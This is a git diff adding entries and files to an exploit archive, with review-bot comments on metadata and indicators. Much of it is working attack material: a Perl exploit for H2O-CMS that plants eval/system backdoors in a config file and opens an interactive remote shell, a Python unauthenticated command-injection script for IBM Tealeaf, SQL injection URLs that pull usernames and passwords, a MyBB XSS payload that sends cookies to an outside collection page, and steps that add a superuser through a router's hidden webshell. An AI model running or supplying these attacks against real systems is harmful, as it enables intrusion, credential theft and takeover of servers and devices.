diff --git a/files.csv b/files.csv
index bd42a00c6..27c07355f 100755
--- a/files.csv
+++ b/files.csv
@@ -15269,7 +15269,7 @@ id,file,description,date,author,platform,type,port
17597,platforms/php/webapps/17597.txt,"SiteGenius Blind SQL injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - (.pls) Buffer Overflow Vulnerability (DEP BYPASS)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0
17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server DoS",2011-08-03,"Craig Freyman",windows,dos,0
-17602,platforms/php/webapps/17602.txt,"WordPress TimThumb Plugin - Remote Code Execution",2011-08-03,MaXe,php,webapps,0
+17602,platforms/php/webapps/17602.txt,"WordPress TimThumb Plugin 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0
17603,platforms/php/webapps/17603.txt,"Joomla Component (com_jdirectory) SQL Injection Vulnerability",2011-08-03,"Caddy Dz",php,webapps,0
17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0
17605,platforms/windows/local/17605.rb,"ABBS Electronic Flashcards 2.1 - Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0
@@ -29291,3 +29291,30 @@ id,file,description,date,author,platform,type,port
32526,platforms/php/webapps/32526.txt,"ClipShare Pro 4.0 'fullscreen.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0
32527,platforms/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 'html-tidy-logic.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0
32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 'pg' Parameter Cross-Site Scripting Vulnerability",2008-10-24,"Ghost Hacker",php,webapps,0
+32529,platforms/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 Remote Command Execution Vulnerability",2008-10-25,"Varun Srivastava",multiple,remote,0
+32530,platforms/linux/remote/32530.txt,"Lynx 2.8 '.mailcap' and '.mime.type' Files Local Code Execution Vulnerability",2008-11-03,"Piotr Engelking",linux,remote,0
+32531,platforms/php/webapps/32531.txt,"phpMyAdmin <= 3.0.1 'pmd_pdf.php' Cross Site Scripting Vulnerability",2008-10-27,"Hadi Kiamarsi",php,webapps,0
+32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 'include/common.php' Remote File Include Vulnerability",2008-10-27,Cru3l.b0y,php,webapps,0
+32533,platforms/php/webapps/32533.txt,"Tandis CMS 2.5 'index.php' Multiple SQL Injection Vulnerabilities",2008-10-27,G4N0K,php,webapps,0
+32534,platforms/unix/dos/32534.py,"Python <= 2.5.2 'Imageop' Module Argument Validation Buffer Overflow Vulnerability",2008-10-27,"Chris Evans",unix,dos,0
+32535,platforms/php/webapps/32535.txt,"MyBB 1.4.2 'moderation.php' Cross-Site Scripting Vulnerability",2008-10-27,Kellanved,php,webapps,0
+32536,platforms/php/webapps/32536.txt,"bcoos 1.0.13 'modules/banners/click.php' SQL Injection Vulnerability",2008-10-27,DeltahackingTEAM,php,webapps,0
+32537,platforms/php/webapps/32537.txt,"All In One 1.4 Control Panel 'cp_polls_results.php' SQL Injection Vulnerability",2008-10-27,ExSploiters,php,webapps,0
+32538,platforms/php/webapps/32538.txt,"PHP-Nuke Nuke League Module 'tid' Parameter Cross-Site Scripting Vulnerability",2008-10-28,Ehsan_Hp200,php,webapps,0
+32539,platforms/php/webapps/32539.html,"Microsoft Internet Explorer 6.0 '&NBSP;' Address Bar URI Spoofing Vulnerability",2008-10-27,"Amit Klein",php,webapps,0
+32540,platforms/php/webapps/32540.pl,"H2O-CMS 3.4 PHP Code Injection and Cookie Authentication Bypass Vulnerabilities",2008-10-28,StAkeR,php,webapps,0
+32541,platforms/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 'id' SQL Injection Vulnerability",2008-10-28,d3v1l,php,webapps,0
+32542,platforms/php/webapps/32542.txt,"Elkagroup Image Gallery 1.0 'view.php' SQL Injection Vulnerability",2008-10-28,G4N0K,php,webapps,0
+32543,platforms/php/webapps/32543.txt,"KKE Info Media Kmita Catalogue 2 'search.php' Cross Site Scripting Vulnerability",2008-10-28,cize0f,php,webapps,0
+32544,platforms/php/webapps/32544.txt,"KKE Info Media Kmita Gallery Multiple Cross-Site Scripting Vulnerabilities",2008-10-29,cize0f,php,webapps,0
+32545,platforms/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Webshell",2014-03-26,"Groundworks Technologies",hardware,webapps,80
+32546,platforms/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,php,webapps,0
+32547,platforms/php/webapps/32547.txt,"Extrakt Framework 0.7 'index.php' Cross Site Scripting Vulnerability",2008-10-29,ShockShadow,php,webapps,0
+32548,platforms/linux/remote/32548.html,"Opera Web Browser 9.x History Search and Links Panel Cross Site Scripting Vulnerabilities",2008-10-30,"Stefano Di Paola",linux,remote,0
+32549,platforms/asp/webapps/32549.txt,"Dorsa CMS 'Default_.aspx' Cross Site Scripting Vulnerability",2008-10-29,Pouya_Server,asp,webapps,0
+32550,platforms/windows/dos/32550.html,"Microsoft DebugDiag 1.0 'CrashHangExt.dll' ActiveX Control Remote Denial of Service Vulnerability",2008-10-30,suN8Hclf,windows,dos,0
+32551,platforms/linux/dos/32551.txt,"Dovecot 1.1.x Invalid Message Address Parsing Denial of Service Vulnerability",2008-10-30,anonymous,linux,dos,0
+32552,platforms/hardware/remote/32552.txt,"SonicWALL Content Filtering Blocked Site Error Page Cross-Site Scripting Vulnerability",2008-10-30,pagvac,hardware,remote,0
+32553,platforms/php/webapps/32553.txt,"phpWebSite <= 0.9.3 'links.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
+32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro 'pages.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
+32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 History Search Input Validation Vulnerability",2008-10-31,NeoCoderz,windows,remote,0
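Review bot: Row 32539 files a Microsoft Internet Explorer 6.0 address-bar spoofing issue under `platforms/php/webapps` with platform `php` and type `webapps`, which contradicts the product named in its own description, so anyone filtering the index by platform will miss it. A Windows client-side classification looks intended, though the correct path cannot be confirmed from this hunk. Row 32530 is titled "Local Code Execution" but is typed `remote`. Row 32553 claims `<= 0.9.3` in its title, while the added 32553.txt says the affected versions are unknown and that the vendor disputes the issue. These fields drive search and triage, so they should be reconciled with the advisory text before merge.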
diff --git a/platforms/asp/webapps/32549.txt b/platforms/asp/webapps/32549.txt
new file mode 100755
index 000000000..148379dfe
--- /dev/null
+++ b/platforms/asp/webapps/32549.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31992/info
+
+Dorsa CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/Default_.aspx?lang=1&sub=5&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E
\ No newline at end of file
diff --git a/platforms/hardware/remote/32552.txt b/platforms/hardware/remote/32552.txt
new file mode 100755
index 000000000..83eb8122e
--- /dev/null
+++ b/platforms/hardware/remote/32552.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31998/info
+
+SonicWALL Content Filtering is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input when displaying URI address data in a blocked-site error page.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of an arbitrary site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to SonicWALL Content Filtering on SonicOS Enhanced 4.0.1.1 are vulnerable.
+
+http://www.example.com/fuck
\ No newline at end of file
diff --git a/platforms/hardware/webapps/32545.txt b/platforms/hardware/webapps/32545.txt
new file mode 100755
index 000000000..9f90e4f88
--- /dev/null
+++ b/platforms/hardware/webapps/32545.txt
@@ -0,0 +1,87 @@
+*Title:*
+
+Allied Telesis AT-RG634A ADSL Broadband router hidden administrative
+unauthenticated webshell.
+
+*Vulnerability Information:*
+- CVE: CVE-2014-1982
+- Type of Vulnerability:
+ - CWE-78 : OS Command Injection
+ - CWE-306 : Missing Authentication for Critical Function
+
+*Affected products:*
+
+- Allied Telesis AT-RG634A ADSL Broadband router. (version 3.3+ and
+probably others)
+
+Other products like,
+ - Allied Telesis iMG624A (firmware version, 3.5)
+ - Allied Telesis iMG616LH (firmware version, +2.4)
+ - Allied Telesis iMG646BD (firmware version, 3.5)
+
+*Vendor:*
+- Allied Telesis : http://www.alliedtelesis.com//
+
+
+has the same vulnerbility, but the vendor reports that the version
+3.8.05 of the firmware has already addressed this issue, but we where
+unable to test nor confirm this information.
+
+*Security Patches / Workaround:*
+
+- Allied Telesis has noted that the AT-RG634A product is no longer
+supported, but gives a workaround
+to mitigate the issue.
+
+Configure the device so that only trusted devices can
+access the target device using the following command,
+
+"WEBSERVER SET MANAGEMENTIP "
+
+*Short Description:*
+
+The Allied Telesis AT-RG634A ADSL Broadband router has a hidden url
+page in their admnistrative HTTP interface capable of executing
+commands as admin without requiring any kind of authentication.
+
+*Description:*
+
+"The AT-RG634 is a full-featured, broadband media gateway and router
+designed for cost-effective delivery of advanced IP Triple Play voice,
+video and data services over an ADSL infrastructure. The RG634
+supports Layer 3 functions, including NAT, DMZ, and Stateful
+inspection firewall for delivery of revenue-generating services such
+as home networking and security services." (from
+www.alliedtelesis.com/p-2345.html)
+
+The Allied Telesis AT-RG634A ADSL Broadband router has a hidden URL
+(/cli.html) page to execute CLI command with admin priviledges,
+available by default and without any kind of authentication.
+
+Having as impact a total compromise of the target device.
+
+*Steps to reproduce:*
+
+- Connect via HTTP to the hidden page http:///cli.html a
+input box is shown, every command typed there will be executed as admin.
+
+Entering the following lines in the hidden page (/cli.html) a new
+telnet admin user called "eviluser" is added to the system.
+
+>> system add login eviluser system set user eviluser access
+>> superuser.
+
+
+*Credits:*
+
+This security issue was discovered and researched by Sebastian Muniz
+(topo), Security Researcher of Groundworks Technologies
+(http://www.groundworkstech.com)
+
+
+*License:*
+
+The contents of this advisory are copyright (c) 2014 Groundworks
+Technologies,and are licensed under a Creative Commons Attribution
+Non-Commercial Share-Alike 3.0 (United States) License:
+http://creativecommons.org/licenses/by-nc-sa/3.0/us/
\ No newline at end of file
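Review bot: The workaround line `"WEBSERVER SET MANAGEMENTIP "` ends without its argument, so the only mitigation offered for a device the vendor no longer supports cannot be applied as written. The argument was presumably lost in conversion; the line should read something like `WEBSERVER SET MANAGEMENTIP <trusted-management-ip>`, where the bracketed value is a placeholder to check against the vendor documentation. Separately, the sentence starting "has the same vulnerbility" is cut off from the "Other products like" list by the *Vendor:* block, which makes the firmware 3.8.05 statement hard to attribute. Moving the vendor block above the product list would restore the sentence.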
diff --git a/platforms/linux/dos/32551.txt b/platforms/linux/dos/32551.txt
new file mode 100755
index 000000000..98e60174b
--- /dev/null
+++ b/platforms/linux/dos/32551.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/31997/info
+
+Dovecot is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted email headers.
+
+An attacker can exploit this issue to prevent recipients from accessing their mailboxes.
+
+For an exploit to succeed, the IMAP client connecting to Dovecot must use the FETCH ENVELOPE command.
+
+The issue affects Dovecot 1.1.4 and 1.1.5.
+
+The following invalid message address header is sufficient to trigger this issue:
+
+"From: ("
\ No newline at end of file
diff --git a/platforms/linux/remote/32530.txt b/platforms/linux/remote/32530.txt
new file mode 100755
index 000000000..7ce9e15d0
--- /dev/null
+++ b/platforms/linux/remote/32530.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/31917/info
+
+Lynx is prone to a local code-execution vulnerability.
+
+Successful exploits may allow attackers to execute arbitrary code within the context of the user running the affected application.
+
+Versions prior to Lynx 2.8.6rel.4 are affected.
+
+.mime.types:
+application/x-bug bug
+
+.mailcap:
+application/x-bug; xmessage 'Hello, World!'
+
diff --git a/platforms/linux/remote/32548.html b/platforms/linux/remote/32548.html
new file mode 100755
index 000000000..717d20176
--- /dev/null
+++ b/platforms/linux/remote/32548.html
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31991/info
+
+Opera Web Browser is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, change the browser's settings, and launch other attacks.
+
+Versions prior to Opera Web Browser 9.62 are vulnerable.
+
+NOTE: The 'History Search' issue described here may be related to the 'History Search' issue that was previously described in BID 31842 'Opera Web Browser Multiple Cross Site Scripting Vulnerabilities'.
+
+ Click me...
# milw0rm.com [2008-10-30]
\ No newline at end of file
diff --git a/platforms/multiple/remote/32529.java b/platforms/multiple/remote/32529.java
new file mode 100755
index 000000000..8fd5a6b2a
--- /dev/null
+++ b/platforms/multiple/remote/32529.java
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/31916/info
+
+Sun Java Web Start is prone to a remote command-execution vulnerability.
+
+Successful exploits may allow attackers to execute arbitrary commands on an unsuspecting user's computer. This may aid in further attacks.
+
+We don't know which versions of Java Web Start are affected. We will update this BID when more information is released.
+
+BasicService basicService = (BasicService) ServiceManager.lookup("javax.jnlp.BasicService");
+
+URL mike = new URL("file:\\C:\\music.rm");
+
+basicService.showDocument(mike);
diff --git a/platforms/php/webapps/32531.txt b/platforms/php/webapps/32531.txt
new file mode 100755
index 000000000..8f443d1af
--- /dev/null
+++ b/platforms/php/webapps/32531.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31928/info
+
+phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/pmd_pdf.php?db=>">
\ No newline at end of file
diff --git a/platforms/php/webapps/32532.txt b/platforms/php/webapps/32532.txt
new file mode 100755
index 000000000..cbf6db1e9
--- /dev/null
+++ b/platforms/php/webapps/32532.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31929/info
+
+The 'bcoos' program is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+This issue affects 'bcoos' 1.0.13; other versions may also be affected.
+
+http://www.example.com/include/common.php?XOOPS_ROOT_PATH=shell
\ No newline at end of file
diff --git a/platforms/php/webapps/32533.txt b/platforms/php/webapps/32533.txt
new file mode 100755
index 000000000..205d6ab48
--- /dev/null
+++ b/platforms/php/webapps/32533.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31930/info
+
+Tandis CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Tandis CMS 2.5.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users
+
+http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--
\ No newline at end of file
diff --git a/platforms/php/webapps/32535.txt b/platforms/php/webapps/32535.txt
new file mode 100755
index 000000000..88c6ad53a
--- /dev/null
+++ b/platforms/php/webapps/32535.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31935/info
+
+MyBB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MyBB 1.4.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url='%2Balert('XSS!')// http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%20%2B%27http://www.example2.com/cookiejar.php?c=%27%2Bdocument.cookie// http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%2Beval(%22u%3D%27application%2Fx-www-%27%2B%20%27form-urlencoded%27%22%2B%20String.fromCharCode(59)%20%2B%22c%3D%27Content-type%27%22%2B%20String.fromCharCode(59)%20%2B%22d%3D%27Content-length%27%22%2B%20String.fromCharCode(59)%20%2B%22reg%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22reg.open(%27GET%27%2C%20%27http%3A%2F%2Fwww.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%2C%20false)%22%2B%20String.fromCharCode(59)%20%2B%22reg.send(null)%22%2B%20String.fromCharCode(59)%20%2B%22r%3Dreg.responseText%22%2B%20String.fromCharCode(59)%20%2B%22t%3D%27http%3A%2F%2Fwww.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%22%2B%20String.fromCharCode(59)%20%2B%22t2%3D%27%26replacement%3D%241%26active%3D1%26my_post%22%20%20%20%20%2B%22_key%3D%27%2Br.substr(r.indexOf(%27my_post_%22%20%2B%22key%27%2B%20%27%27) %2B15%2C32)%22%2F*%20%20%20%20%20%20*%2F%2B%22%20%2B%27%26title%3DPwned%26description%27%2B%20%27%3Dfoo%26regex%3D%22%20%20%20%20%20%20%20%2B%22evil(.*)evil%2523e%2500test%27%22%2B%20String.fromCharCode(59)%20%2B%22r2%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22r2.open(%27POST%27%2Ct%2Cfalse)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(d%2Ct2.length)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(c%2Cu)%22%2B%20String.fromCharCode(59)%20%2B%22r2.sendAsBinary(t2)%22%2B%20String.fromCharCode(59))//
\ No newline at end of file
diff --git a/platforms/php/webapps/32536.txt b/platforms/php/webapps/32536.txt
new file mode 100755
index 000000000..db134b43a
--- /dev/null
+++ b/platforms/php/webapps/32536.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31941/info
+
+The 'bcoos' program is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects bcoos 1.0.13; other versions may also be affected.
+
+http://www.example.com/[p4th]/modules/banners/click.php?bid=-1' union+select+pass+from+bcoos_users+limit 1,0/*
\ No newline at end of file
diff --git a/platforms/php/webapps/32537.txt b/platforms/php/webapps/32537.txt
new file mode 100755
index 000000000..50cd97ff3
--- /dev/null
+++ b/platforms/php/webapps/32537.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31949/info
+
+All In One Control Panel (AIOCP) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+AIOCP 1.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--
\ No newline at end of file
diff --git a/platforms/php/webapps/32538.txt b/platforms/php/webapps/32538.txt
new file mode 100755
index 000000000..1244f2a17
--- /dev/null
+++ b/platforms/php/webapps/32538.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31952/info
+
+PHP-Nuke Nuke League module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/modules.php?name=League&file=index&op=team&tid=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32539.html b/platforms/php/webapps/32539.html
new file mode 100755
index 000000000..e3d417908
--- /dev/null
+++ b/platforms/php/webapps/32539.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31960/info
+
+Internet Explorer is affected by a URI-spoofing vulnerability because it fails to adequately handle specific combinations of the non-breaking space character ('&NBSP;').
+
+An attacker may leverage this issue to spoof the source URI of a site presented to an unsuspecting user. This may lead to a false sense of trust because the user may be presented with a source URI of a trusted site while interacting with the attacker's malicious site.
+
+Internet Explorer 6 is affected by this issue.
+
+Example (In words, this is Example) This causes a link whose URL appears, IN THE ADDRESS BAR, as (may wrap around): http://www.example.com . . .phish.site/ (In words, this appears like "http://www.example.com" ; followed by 30 spaces, a dot, 31 spaces, a dot, 13 spaces, a dot and finally "phish.site/")
\ No newline at end of file
diff --git a/platforms/php/webapps/32540.pl b/platforms/php/webapps/32540.pl
new file mode 100755
index 000000000..81c696f74
--- /dev/null
+++ b/platforms/php/webapps/32540.pl
@@ -0,0 +1,79 @@
+source: http://www.securityfocus.com/bid/31961/info
+
+
+H2O-CMS is prone to a PHP code-injection vulnerability and a cookie authentication-bypass vulnerability.
+
+An attacker can exploit the PHP code-injection issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+
+Attackers can exploit the cookie authentication-bypass vulnerability to gain administrative access; this may aid in further attacks.
+
+Versions up to and including H2O-CMS 3.4 are vulnerable.
+
+#!/usr/bin/perl
+# ----------------------------------------------------------
+# H2O-CMS <= 3.4 Remote Command Execution Exploit (mq = Off)
+# Discovered By StAkeR[at]hotmail[dot]it
+# Download On http://sourceforge.net/projects/h2o-cms
+# ----------------------------------------------------------
+
+use strict;
+use LWP::UserAgent;
+use LWP::Simple;
+
+my $post;
+my $sysc;
+my $host = shift or athos();
+my $auth = "user=admin&id=1&admin=1";
+my $http = new LWP::UserAgent;
+
+my $write = {
+ 'site_title' => '";""; error_reporting(0); echo"//athos"; "',
+ 'db_server' => '";""; include($_REQUEST["i"]); "',
+ 'db_name' => '";""; eval($_REQUEST["g"]); "',
+ 'db_username' => '";""; echo shell_exec($_REQUEST["c"]); "',
+ 'db_password' => '";""; echo system($_REQUEST["s"]); "',
+ 'save' => 'Save',
+ };
+
+
+$http->default_header('Cookie' => $auth);
+$post = $http->post($host.'/index.php?option=SaveConfig',$write);
+
+
+sub start_exec
+{
+ my $site = shift @_;
+ my $exec = shift @_;
+ my $view = get($site.'/includes/config.php?c='.$exec);
+
+ return $view;
+}
+
+sub athos
+{
+ print STDOUT "# Usage: perl $0 http://[host]\n";
+ print STDOUT "# Remote Command Execution Exploit\n";
+ exit;
+}
+
+unless(get($host) =~ /\/\/athos/i)
+{
+ print STDOUT "# Exploit Failed!\n";
+ exit;
+}
+else
+{
+ while(1)
+ {
+ if(defined start_exec($host,$sysc))
+ {
+ print STDOUT "[athos-shell] ~# ";
+ chomp($sysc = );
+
+ print STDOUT "[athos-shell] ~# ".start_exec($host,$sysc)."\n";
+ }
+ }
+}
+
+__END__
+
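Review bot: The comment header under the shebang records the author and download link but nothing a defender can act on, even though the script itself shows the indicators. I would add a comment such as `# Indicators: POST to /index.php?option=SaveConfig with Cookie "user=admin&id=1&admin=1"; include/eval/shell_exec/system calls on request variables appearing in includes/config.php`. The hard-coded `$auth` value suggests the application accepts admin state asserted by the client. The header should therefore also say that the fix is server-side session checks plus escaping of values written to the config file, not input filtering alone.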
diff --git a/platforms/php/webapps/32541.txt b/platforms/php/webapps/32541.txt
new file mode 100755
index 000000000..c364a3804
--- /dev/null
+++ b/platforms/php/webapps/32541.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31963/info
+
+H&H Solutions WebSoccer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+H&H Solutions WebSoccer 2.80 is vulnerable; other versions may also be affected.
+
+http://www.example.com/liga.php?id=1'UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5/*
\ No newline at end of file
diff --git a/platforms/php/webapps/32542.txt b/platforms/php/webapps/32542.txt
new file mode 100755
index 000000000..6aace43bf
--- /dev/null
+++ b/platforms/php/webapps/32542.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31966/info
+
+Elkagroup is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+This issue affects Elkagroup 1.0; other versions may also be affected.
+
+http://www.example.com/view.php?cid=-33%20UNION%20ALL%20SELECT%200,user(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--&uid=0&new=0
\ No newline at end of file
diff --git a/platforms/php/webapps/32543.txt b/platforms/php/webapps/32543.txt
new file mode 100755
index 000000000..7184e2886
--- /dev/null
+++ b/platforms/php/webapps/32543.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31968/info
+
+Kmita Catalogue is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Kmita Catalogue V2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/search.php?q=&Search=Search
\ No newline at end of file
diff --git a/platforms/php/webapps/32544.txt b/platforms/php/webapps/32544.txt
new file mode 100755
index 000000000..9e8a643d0
--- /dev/null
+++ b/platforms/php/webapps/32544.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31970/info
+
+Kmita Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/kmitag/index.php?begin=10&catid=3
+
+http://www.example.com/kmitag/search.php?searchtext=&Search=Search
\ No newline at end of file
diff --git a/platforms/php/webapps/32546.py b/platforms/php/webapps/32546.py
new file mode 100755
index 000000000..de5cd1d00
--- /dev/null
+++ b/platforms/php/webapps/32546.py
@@ -0,0 +1,63 @@
+# IBM Tealeaf CX (v8 release 8) Remote OS Command Injection
+# Date: 11/08/2013
+# Exploit author: drone
+# More information: http://www-01.ibm.com/support/docview.wss?uid=swg21667630
+# Vendor homepage: http://www-01.ibm.com/software/info/tealeaf/
+# Version: Version 8 Release 8 (likely all versions prior)
+# Tested on: Redhat Linux 6.2
+# CVE: CVE-2013-6719 / CVE-2013-6720
+
+import requests
+from argparse import ArgumentParser
+
+""" Remote OS command injection (no auth)
+ IBM TeaLeaf Version 8 Release 8
+ drone (@dronesec)
+
+ Bonus:
+ LFI at /download.php?log=../../etc/passwd
+"""
+
+
+def run(options):
+ access = "http://{0}:{1}/delivery.php".format(options.address, options.port)
+ data = {"perform_action" : "testconn",
+ "delete_id" : "",
+ "testconn_host" : "8.8.8.8 -c 1 ; {0} ; ping 8.8.8.8 -c 1".format(options.cmd),
+ "testconn_port" : 1966,
+ "testconn_t" : "false",
+ "csrf" : "afe2fce60e94a235511a7397ec5c9a87fb7fc25b", # it doesnt even care
+ "delivery_mode" : 0,
+ "batch_interval" : 60,
+ "polling_interval" : 10,
+ "watchdog_timer" : 30,
+ "max_queue_depth" : 50000000,
+ "timesource_host" : "test",
+ "timesource_port" : 1966,
+ "staticshit_enabled" : "on", # seriously
+ "staticshit_host" : "test",
+ "staticshit_intervalseconds" : 60,
+ "staticshit_port" : 1966
+ }
+
+ response = requests.post(access, data=data, timeout=20.0)
+ if response.status_code == 200:
+ # lazy parsing
+ result = response.content.split("alert('")[1].split('onUnload')[0]
+ for x in result.split("\\n"):
+ if 'PATTERN' in x: break
+ print x
+
+
+def parse_args():
+ parser = ArgumentParser()
+ parser.add_argument("-i", help="Server address", action="store",
+ required=True, dest="address")
+ parser.add_argument("-p", help='Server port', action='store',
+ dest='port', default=8080)
+ parser.add_argument("-c", help='Command to exec', action='store',
+ dest='cmd', default='whoami')
+ return parser.parse_args()
+
+if __name__ == "__main__":
+ run(parse_args())
\ No newline at end of file
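Review bot: The header comments give the CVE ids and the vendor bulletin but no detection or mitigation guidance. The triple-quoted string after the `import` lines is also not a module docstring, because it follows other statements. I would move that text to the top of the file and add a line such as `# Indicators: unauthenticated POST to /delivery.php with perform_action=testconn and shell metacharacters (";") in testconn_host`. The inline remark on the `csrf` field suggests the token is not validated server-side. That is worth stating explicitly next to the bulletin URL already in the header, so readers know which behaviour the vendor fix has to change.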
diff --git a/platforms/php/webapps/32547.txt b/platforms/php/webapps/32547.txt
new file mode 100755
index 000000000..7771cc296
--- /dev/null
+++ b/platforms/php/webapps/32547.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/31971/info
+
+Extrakt Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize
+user-supplied data.
+
